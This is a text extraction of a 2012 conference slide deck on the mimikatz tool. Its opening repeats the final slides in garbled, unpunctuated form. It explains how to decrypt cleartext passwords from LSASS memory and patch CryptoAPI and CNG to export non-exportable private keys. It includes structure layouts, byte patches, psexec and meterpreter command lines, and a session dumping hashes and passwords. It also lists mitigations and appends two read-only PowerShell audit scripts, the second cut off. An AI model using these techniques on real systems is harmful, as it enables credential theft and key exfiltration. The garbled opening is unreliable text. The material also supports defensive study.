especially if you have written down the corresponding slide number
Blog, Source Code & Contact

blog: http://blog.gentilkiwi.com/
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz :: sekurlsa :: livessp / how?
Let's login with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).
07/11/2012 Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 24
Call stacks reaching lsasrv!LsaProtectMemory (innermost frame first):
    lsasrv!LsaProtectMemory <- livessp!LiveMakeSupplementalCred <- livessp!LiveMakeSecPkgCredentials <- livessp!LsaApLogonUserEx2 <- livessp!SpiLogonUserEx2
    lsasrv!LsaProtectMemory <- msv1_0!NlpAddPrimaryCredential <- msv1_0!SspAcceptCredentials <- msv1_0!SpAcceptCredentials
    lsasrv!LsaProtectMemory <- tspkg!TSHidePassword <- tspkg!SpAcceptCredentials
1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah! Pass-the-Hash capability with a Live account too…
A Live user can logon through RDP via SSO.
mimikatz :: sekurlsa :: livessp / workflow
Workflow: LsaEnumerateLogonSessions -> for each LUID -> livessp!LiveGlobalLogonSessionList -> search linked list for LUID -> KIWI_LIVESSP_LIST_ENTRY -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, are you not curious to test one with this trap?
Me? Yes!
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account.
After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
Call stacks reaching lsasrv!LsaProtectMemory (innermost frame first):
    lsasrv!LsaProtectMemory <- kerberos!KerbHideKey <- kerberos!KerbCreatePrimaryCredentials <- kerberos!KerbCreateLogonSession <- kerberos!SpAcceptCredentials   (Kerberos ticket part? Maybe ;))
    lsasrv!LsaProtectMemory <- kerberos!KerbHidePassword <- kerberos!KerbCreateLogonSession <- kerberos!SpAcceptCredentials   (Kerberos part for the password)
    lsasrv!LsaProtectMemory <- msv1_0!NlpAddPrimaryCredential <- msv1_0!SspAcceptCredentials <- msv1_0!SpAcceptCredentials
    lsasrv!LsaProtectMemory <- wdigest!SpAcceptCredentials
    lsasrv!LsaProtectMemory <- tspkg!TSHidePassword <- tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) / workflow
Workflow: LsaEnumerateLogonSessions -> for each LUID -> kerberos!KerbGlobalLogonSessionTable -> RtlLookupElementGenericTableAvl -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) / workflow
Workflow: LsaEnumerateLogonSessions -> for each LUID -> kerberos!KerbLogonSessionList -> search linked list for LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa / demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos / "hu?"
Ok. It works…
But why?
Not at every logon on NT5 (can need an unlock).
From my understanding of Microsoft explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy too)
Microsoft's implementation of Kerberos is full of logical…
– For password auth:
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth:
  • No password on client
  • No hash on client
  – NTLM hash on client…
  – KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) in the LSASS process, to benefit from its keys when we called it.
Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz :: sekurlsa / LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
Keys involved (lsasrv inside the lsass process; mimikatz copies them into its own loaded lsasrv before calling LsaUnprotectMemory):
    g_cbRandomKey   DWORD (256)
    g_pRandomKey    BYTE[g_cbRandomKey]
    g_pDESXKey      BYTE[144]
    g_Feedback      BYTE[8]
mimikatz :: sekurlsa / LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
Keys involved (lsasrv inside the lsass process; mimikatz copies them into its own loaded lsasrv before calling LsaUnprotectMemory):
    InitializationVector   BYTE[16]
    h3DesKey               -> KIWI_BCRYPT_KEY
    hAesKey                -> KIWI_BCRYPT_KEY

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data;    /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa / memo
Security Packages:
    Package          Symbols                                                  Type
    tspkg            tspkg!TSGlobalCredTable                                  RTL_AVL_TABLE
    wdigest          wdigest!l_LogSessList                                    LIST_ENTRY
    livessp          livessp!LiveGlobalLogonSessionList                       LIST_ENTRY
    kerberos (nt5)   kerberos!KerbLogonSessionList                            LIST_ENTRY
    kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                     RTL_AVL_TABLE
    msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount   LIST_ENTRY / ULONG
Protection Keys:
    Key    NT5 Symbols
    RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
    DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

    Key    NT6 Symbols
    (IV)   lsasrv!InitializationVector
    3DES   lsasrv!h3DesKey
    AES    lsasrv!hAesKey
mimikatz :: sekurlsa / memo
Some commands:
    mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
    meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
Sample session:
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
    msv1_0 :   Utilisateur : Gentil Kiwi   Domaine : vm-w8-rp-x   Hash LM : d0e9aee149655a6075e4540af1f22d3b   Hash NTLM : cc36cf7a8514893efccd332446158b1a
    kerberos : Utilisateur : Gentil Kiwi   Domaine : vm-w8-rp-x   Mot de passe : waza1234
    wdigest :  Utilisateur : Gentil Kiwi   Domaine : vm-w8-rp-x   Mot de passe : waza1234
    tspkg :    Utilisateur : Gentil Kiwi   Domaine : vm-w8-rp-x   Mot de passe : waza1234
    livessp :  nt (LUID KO)
mimikatz :: sekurlsa / what we can do?
Basics:
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash leaves traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separated network (or forest) for privileged tasks
More in depth:
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– Nothing exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
– Take opportunities to stop retro compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
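Added example, not from the deck: a read-only PowerShell audit of which of the SSPs listed above are registered on a host and whether the NTLM/LM restrictions the slide recommends are set. Registry paths and value names are standard Windows settings; the WDigest UseLogonCredential value postdates the talk (KB2871997, Windows 8.1 and later), and the function name is mine.

```powershell
# Added example (not mimikatz code): audit LSA settings behind the mitigation list.
# Read-only; run in an elevated PowerShell on the host to audit.
function Get-LsaCredentialExposure {
    $lsa  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $msv  = Join-Path $lsa 'MSV1_0'
    $wdig = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

    # Packages the talk shows holding reversibly encrypted credentials in LSASS.
    $caching = 'msv1_0', 'kerberos', 'wdigest', 'tspkg', 'livessp'

    # Return a registry value, or $null when the value is absent
    # (absent means "OS default" for every setting read below).
    function Read-Value([string]$Path, [string]$Name) {
        try   { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
        catch { $null }
    }

    # "Security Packages" is REG_MULTI_SZ in both Lsa and Lsa\OSConfig;
    # empty-string entries are padding and are dropped.
    $packages = @(Read-Value $lsa 'Security Packages') +
                @(Read-Value (Join-Path $lsa 'OSConfig') 'Security Packages') |
                Where-Object { $_ } | Sort-Object -Unique

    $lmLevel  = Read-Value $lsa 'LmCompatibilityLevel'          # 5 = NTLMv2 only, refuse LM and NTLM
    $noLmHash = Read-Value $lsa 'NoLMHash'                      # 1 = do not store the LM hash
    $ntlmOut  = Read-Value $msv 'RestrictSendingNTLMTraffic'    # 2 = deny all outgoing NTLM
    $ntlmIn   = Read-Value $msv 'RestrictReceivingNTLMTraffic'  # 2 = deny all incoming NTLM
    # Later than the talk (KB2871997): 0 stops WDigest from caching the plaintext password.
    $wdigestCache = Read-Value $wdig 'UseLogonCredential'

    [pscustomobject]@{
        SecurityPackages          = $packages
        CredentialCachingSSPs     = @($packages | Where-Object { $caching -contains $_.ToLower() })
        LmCompatibilityLevel      = if ($null -eq $lmLevel)      { 'default (3 on NT6)' } else { $lmLevel }
        NoLMHash                  = if ($null -eq $noLmHash)     { 'default (1 on NT6)' } else { $noLmHash }
        RestrictSendingNTLM       = if ($null -eq $ntlmOut)      { 'not set (allow)' }    else { $ntlmOut }
        RestrictReceivingNTLM     = if ($null -eq $ntlmIn)       { 'not set (allow)' }    else { $ntlmIn }
        WDigestUseLogonCredential = if ($null -eq $wdigestCache) { 'not set' }            else { $wdigestCache }
    }
}

$audit = Get-LsaCredentialExposure
$audit | Format-List

# Surface the two findings the slide argues about: NTLM still usable, and SSPs
# that keep reusable credentials still registered.
if ($audit.RestrictSendingNTLM -ne 2) {
    Write-Warning 'Outgoing NTLM is not blocked (RestrictSendingNTLMTraffic is not 2).'
}
if ($audit.CredentialCachingSSPs.Count -gt 0) {
    Write-Warning ('SSPs keeping reusable credentials in LSASS: ' + ($audit.CredentialCachingSSPs -join ', '))
}
```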
mimikatz :: crypto / what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public in DER format
    – with private keys in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz :: crypto / how it's protected?
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or password of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
(Password and Popup: a constraint for most users, unavailable for computer keys)
    certutil -importpfx mycert.p12 NoExport
    certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi / how it works?
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi / how it's exported? (… level)
Simplified export path (the slide labels this view "PLAYSKOOL"); everything happens inside the calling process:
    Process -> CryptoAPI and RSA CSP -> Load Private Key -> DPAPI Decode -> Ask to export Key -> Exportable?
        yes -> Exported Key
        no  -> NTE_BAD_KEY_STATE
mimikatz :: crypto :: patch capi / because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
  - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié
mimikatz :: crypto :: patch capi / because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:
    .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
    .text:0AC0B7CB 90                   nop
    .text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

    .text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
    .text:0AC1F749 90                   nop
    .text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patch capi / demo time
Import, export, import as not exportable… export!
mimikatz :: crypto :: patch capi / limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys in real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng / how it works?
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng / how it's exported? (… level)
Simplified export path (the slide labels this view "PLAYSKOOL"); the key never enters the calling process:
    Process (CNG) --RPC--> KeyIso Service (LSASS Process): Load Private Key -> DPAPI Decode -> Ask to export Key -> Exportable?
        yes -> Exported Key (returned over RPC)
        no  -> NTE_NOT_SUPPORTED
LSASS on NT6: System protected process (ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP)
mimikatz :: crypto :: patch cng / because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportKeys
[user] Clés CNG :
  - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKeyPrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge
mimikatz :: crypto :: patch cng / because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
    .text:6C815210 75 1C    jnz short continue_key_export
    .text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patch cng / demo time
Import, export, import as not exportable… export again!
mimikatz :: crypto :: patch cng / limitations
Patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algs than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…
mimikatz :: crypto :: patch cng / bonus
After one admin patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto / memo
Some commands:
    mimikatz crypto::patchcapi crypto::exportCertificates exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
    mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
    mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password:
– PFX files are protected by this password: mimikatz
Keys:
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto / what we can do?
Exactly the same as for sekurlsa: it will prevent access to accounts/computer
– no admin, no admin, no admin…
Basics:
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
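Added example, not from the deck and not mimikatz code: a read-only PowerShell audit of the two flags the talk patches past (the rsaenh exportability flag and the CNG key export policy), plus the leftover key files the memo slide mentions. It assumes Windows PowerShell 5.1 on .NET Framework 4.6 or later, where GetRSAPrivateKey returns RSACryptoServiceProvider for CAPI keys and RSACng for KSP keys; function names are mine, and keys referenced only from stores other than My will show up as orphan candidates.

```powershell
# Added example (not mimikatz code): list private keys by API, provider and
# exportability, then find user key files no certificate in My points to.
function Get-CertificatePrivateKeyAudit {
    param([string[]]$StorePaths = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))

    foreach ($path in $StorePaths) {
        $certs = Get-ChildItem -Path $path -ErrorAction SilentlyContinue | Where-Object { $_.HasPrivateKey }
        foreach ($cert in $certs) {
            $api = 'other (non-RSA)'; $provider = $null; $exportable = $null; $unique = $null
            try {
                # RSACng = key held by a CNG KSP (keyiso in LSASS); RSACryptoServiceProvider = legacy CAPI CSP.
                $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
                if ($rsa -is [System.Security.Cryptography.RSACng]) {
                    $api        = 'CNG'
                    $provider   = $rsa.Key.Provider.Provider
                    $unique     = $rsa.Key.UniqueName
                    # ExportPolicy is the flag the KSP consults before handing the key back over RPC.
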